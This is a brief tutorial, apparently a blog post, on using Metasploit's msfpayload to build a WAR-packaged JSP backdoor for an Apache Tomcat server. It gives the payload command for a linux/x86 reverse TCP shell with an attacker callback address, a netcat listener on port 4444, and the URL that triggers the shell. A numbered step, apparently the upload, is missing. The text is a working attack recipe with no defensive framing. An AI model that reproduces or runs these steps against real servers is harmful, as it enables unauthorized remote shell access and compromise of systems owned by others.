Create a WAR backdoor with Metasploit
Facing a tomcat server.. and need to upload a WAR backdoor…??, well… we can create a WAR backdoor very easily with Metasploit, ok follow this steps:
1. Creating the backdoor.
dudul@banget:~$ msfpayload linux/x86/shell_reverse_tcp LHOST=172.16.96.1 W > dudul.war Created by msfpayload (http://www.metasploit.com). Payload: linux/x86/shell_reverse_tcp Length: 71 Options: {"LHOST"=>"172.16.96.1"}
it will create a WAR file contain a random name for jsp backdoor file
3. Use netcat to listen for the reverse shell connection.
dudul@banget:~$ nc.traditional -lvp 4444 listening on [any] 4444 ...
4. Access the backdoor with the web browser.
http://172.16.96.140:8080/dudul/spwigfeikmv.jsp
Note: msf create a random jsp file, so… make sure to access the right jsp file
5. Boom… we got a reverse shell connection. ?